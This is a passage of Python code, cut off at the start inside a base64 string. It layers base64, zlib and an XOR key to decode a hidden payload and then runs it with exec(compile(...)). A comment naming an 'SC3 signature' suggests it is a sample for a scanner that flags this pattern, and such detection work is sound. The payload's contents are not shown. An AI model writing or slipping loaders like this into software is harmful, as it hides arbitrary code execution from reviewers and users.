/9ur9+51MYoHprLrZvj++TPRA8eFNzXot4EX2N5COBqiQBqkmH0ts7TH8BVryASx+hshY7+tOnft9zKGXyn0GCxR8/fgK710Qa"
_K = bytes.fromhex("c6401ea496bbcb61eec41d31")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
